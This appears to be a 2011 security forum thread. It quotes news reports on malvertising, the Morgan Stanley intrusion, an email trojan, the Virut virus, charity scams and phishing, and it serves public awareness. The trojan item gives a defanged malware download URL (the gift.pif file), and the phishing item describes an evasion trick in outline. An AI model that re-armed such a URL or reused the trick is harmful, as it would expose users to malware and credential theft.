UK - malvertising attack ...
FYI...
UK - malvertising attack...
- http://www.theregister.co.uk/2011/02...ight_uk_sites/
28 Feb. 2011 - "Several highly trafficked UK sites – including the website of the London Stock Exchange – served malware-tainted ads as the result of a breach of security by a third-party firm they shared in common. Surfers visiting auto-trading site Autotrader.co.uk and the cinema site Myvue.com were also exposed to the attack, which stemmed from a breach at their common ad provider, Unanimis, rather than at any of the three sites themselves. Unconfirmed reports suggest eBay.co.uk was also affected. The malicious ads made several concealed redirects before dropping surfers on a portal pimping rogue anti-virus (AKA scareware)... Websense** confirmed the attack on Monday, saying it had been tracking the progress of the attack over recent days..."
* http://www.highseverity.com/2011/02/...y-malware.html
** http://community.websense.com/blogs/...vertizing.aspx
:mad::fear:
Morgan Stanley security breach...
FYI...
Morgan Stanley security breach...
- http://www.bloomberg.com/news/2011-0...it-google.html
2011-02-28 - "Morgan Stanley experienced a “very sensitive” break-in to its network by the same China-based hackers who attacked Google Inc.’s computers more than a year ago, according to leaked e-mails from a cyber-security company working for the bank. The e-mails from the Sacramento, California-based computer security firm HBGary Inc., which identify the first financial institution targeted in the series of attacks, said the bank considered details of the intrusion a closely guarded secret... The HBGary e-mails don’t indicate what information may have been stolen from Morgan Stanley’s databanks or which of the world’s largest merger adviser’s multinational operations were targeted... a spokeswoman for the New York-based bank, which unlike Google didn’t disclose the attacks publicly, declined to comment on them specifically... The hackers successfully implanted software designed to steal confidential files and internal communications, according to dozens of HBGary e-mails that detail efforts to plug the holes. One e-mail, dated June 19, said that the attackers may be the same ones who had hit a U.K.-based defense contractor and discusses hacking software called Monkif, which can be used by intruders to remotely orchestrate a sophisticated form of cyber attack known as an ‘advanced persistent threat’ or APT..."
- http://blog.damballa.com/?p=341
:fear::mad::fear:
"You have received a gift..." of malware ...
FYI...
"You have received a gift..." of malware...
- http://blog.mxlab.eu/2011/03/01/you-...ad-to-malware/
March 1, 2011 - "... new trojan distribution campaign by email with the subject “You have received a gift from one of our members !” The email is sent from the spoofed address “gifts@freeze.com”, while the SMTP from address is “_www@pictry.loc”... The URL in the email leads to hxxp:// www .i-tec .it/gift.pif and this malicious file is 844kB large... A Backdoor.IRCBot is installed allowing to open a backdoor to the infected computer, combined with Trojan.RunKeys that will make sure that trojans are started up when the computer boots... malware will make a connection with a remote IRC server..."
(Screenshots and more detail available at the MXLabs URL above.)
- http://tools.cisco.com/security/cent...o=1&sortType=d
:fear::mad:
Facebook SCAMS prolific...
FYI... "SCAM of the Day" - it's almost that bad...
Facebook SCAMS prolific...
- http://nakedsecurity.sophos.com/?s=F...+scams&x=0&y=0
March 7, 2011, March 5, 2011, March 3, 2011, March 2, 2011, etc...
:sad::mad:
Malvertisements - a plague...
FYI...
Malvertisements - a plague...
- http://threatpost.com/en_us/blogs/on...nd-2010-030711
March 7, 2011 - "... The Dasient Q4 Malware Update* reported that more than one million Web sites were infected in the last quarter of 2010. That period saw a 25% growth in malicious advertisements from the previous quarter, as attackers found ways to sneak malicious code into widely used syndicated online ad networks. Its a trend that security experts see accelerating in 2011, as malicious advertisements, sometimes referred to as 'malvertisements,' crop up on high profile sites, said Neil Daswani, Chief Technology Officer at Dasient. Daswani said that, overall, his company saw a 100% increase in the amount of malicious advertising from the third- to fourth quarters, 2010. However, much of that was due to an expansion of the sites Dasient monitored, with an increasing focus on so-called 'remnant' ad networks, which aggregate 'remnant' advertisements from direct marketers, who often have little oversight about where the ads appear... In recent weeks, well-ranked sites such as Autotrader .co.uk, cinema site Myvue .com and londonstockexchange .com were reported to have served up malicious advertisements. Malicious ads are commonly used to display pop up messages with links that will take users to a drive by download Web site download rogue anti virus programs or other threats..."
* http://blog.dasient.com/2011/03/dasi...gnificant.html
:fear::mad:
Virut malware spreads with warez ...
FYI...
Virut malware spreads with warez ..
- http://techblog.avira.com/2011/03/11...ut-malware/en/
March 11, 2011 - "W32/Virut.ce is one of the most widespread pieces of malware which can be found on infected computers. This file infector gets massively spread bundled with illegal software (warez). The virus is infecting executable files using latest techniques which make detecting and treating those files particularly difficult. On the current threat landscape we see more server-side polymorphic malware, infecting executable files is not as popular as a few years ago. During the last years emulation techniques have become better which makes detection of polymorphic malware much easier. The authors of the virus weren’t put off by the difficulties they faced in trying to infect executable files. But W32/Virut.ce is not only infecting executable files, the virus also includes a backdoor using the IRC protocol. This allows attackers to download and run further malware from the Internet which can (as example) steal information. The server to which the malware connects is a pre-defined IRC server, the channel is called “virtu”..."
- http://techblog.avira.com/wp-content...Virut_.ce_.pdf
(PDF, 1 MB)
:fear::mad:
FTC advisory - charity SCAMS
FYI...
FTC advisory - charity SCAMS
- http://www.ftc.gov/opa/2011/03/earthquake.shtm
03/14/2011 - "After the earthquake that rocked Japan’s northeast coast and triggered a widespread tsunami last week, the Federal Trade Commission is urging consumers to be cautious of potential charity scams... carefully consider urgent appeals for aid that (are received) in person, by phone or mail, by e-mail, on websites, or on social networking sites. The agency’s Charity Checklist* advises consumers about donating wisely to charities..."
* http://www.ftc.gov/bcp/edu/pubs/cons...ts/alt114.shtm
___
- http://community.websense.com/blogs/...-disaster.aspx
15 Mar 2011
:fear:
Phish targets BoA, PayPal...
FYI...
Phish targets BoA, PayPal...
- http://www.theregister.co.uk/2011/03...irefox_chrome/
17th March 2011 - "... phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email. According to M86 researcher Rodel Mendrez*, the locally stored file opens a web form that collects the customers' login credentials, credit card numbers and other sensitive information and then uses a POST request to zap them to a PHP application on a legitimate website that's been compromised. By avoiding the use of more verbose GET requests and known phishing sites, the scam flies completely under the radar of the browsers' fraud protection features..."
* http://labs.m86security.com/2011/03/...ml-attachment/
March 15th, 2011 - "... Phishers... have found ways to circumvent this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser..."
:fear::spider: